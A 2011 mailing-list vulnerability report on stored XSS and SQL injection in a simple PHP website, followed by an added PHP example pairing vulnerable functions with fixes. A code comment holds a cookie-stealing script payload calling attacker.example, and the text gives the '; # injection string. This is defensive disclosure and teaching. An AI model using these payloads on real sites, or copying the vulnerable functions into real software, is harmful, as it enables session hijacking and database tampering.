Susceptible to XSS attacks and SQL injection attacks


Nicholas Tsoi-A-Sue

May 24, 2011, 11:52:20 PM5/24/11
to Free Simple Software
The website is susceptible to XSS attacks. An attacker can register as a
new member and input JavaScript as his name. Whenever the attacker's
name is printed, the JavaScript will be executed on that user's
machine. This malicious script can steal the user's cookies, allowing
an attacker to impersonate another user.

It is also susceptible to SQL injection attacks. In the change member
address form, a user can fill in garbage data and, for the last field
in the form, fill in "; #". This will comment out the part of the SQL query that
specifies which row to update, and the entire member address table
will be updated.

To prevent these attacks you should sanitize your inputs. There are
many PHP functions that you can use.

Thanks.
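The two bugs reported above, each shown next to a fix, as an added example. This is not code from Free Simple Software or from the original poster; it assumes a PHP 7+ application with a MySQL table named members and columns id, name, street, city and postcode, and it assumes the vulnerable query wraps each form value in single quotes, so the payload from the post needs a leading quote (`'; #`) to close the string literal before the comment marker takes effect.

```php
<?php
// Added example, not part of the original post or of the project's code.
// Table and column names (members, id, name, street, city, postcode) are
// assumptions made for illustration.

// ----- 1. Stored XSS through the member name -----

// Vulnerable: the stored name is echoed verbatim. A name such as
//   <script>new Image().src='//attacker.example/?c='+document.cookie</script>
// runs in the browser of every user who views a page that prints it and
// sends that user's cookies to the attacker.
function render_name_vulnerable(string $name): string
{
    return "<span class=\"member\">$name</span>";
}

// Fixed: escape on output, for the HTML context the value lands in.
// ENT_QUOTES also encodes single quotes, which matters when the same value
// is later placed inside an attribute; the charset must match the page's.
function render_name_safe(string $name): string
{
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<span class=\"member\">$escaped</span>";
}

// ----- 2. SQL injection through the change-address form -----

// Vulnerable: the form fields are concatenated into the statement. With the
// postcode field set to  '; #  the string sent to MySQL becomes
//   UPDATE members SET street='x', city='x', postcode=''; #' WHERE id=42
// As the post describes, # starts a MySQL comment, so the WHERE clause is
// discarded and the UPDATE no longer names a single row.
function update_address_vulnerable(mysqli $db, int $memberId, array $form): bool
{
    $sql = "UPDATE members SET street='{$form['street']}', "
         . "city='{$form['city']}', postcode='{$form['postcode']}' "
         . "WHERE id=$memberId";
    return $db->query($sql) === true;
}

// Fixed: a prepared statement sends the SQL text and the values separately.
// The payload is stored as a (useless) postcode string for the one member
// and the WHERE clause is untouched. Also validate lengths and formats
// before the query; binding stops injection but not garbage data.
function update_address_safe(PDO $db, int $memberId, array $form): int
{
    $stmt = $db->prepare(
        'UPDATE members SET street = :street, city = :city, postcode = :postcode '
        . 'WHERE id = :id'
    );
    $stmt->execute([
        ':street'   => $form['street'],
        ':city'     => $form['city'],
        ':postcode' => $form['postcode'],
        ':id'       => $memberId,
    ]);
    return $stmt->rowCount(); // 1 for an existing member id, never the whole table
}
```

When connecting with PDO to MySQL, set PDO::ATTR_EMULATE_PREPARES to false so the parameters are bound server-side rather than interpolated by the driver, and set PDO::ATTR_ERRMODE to PDO::ERRMODE_EXCEPTION so a failed update is not silently ignored. The memberId passed to update_address_safe should come from the authenticated session, not from the form, or a user can change another member's address even after the injection is fixed.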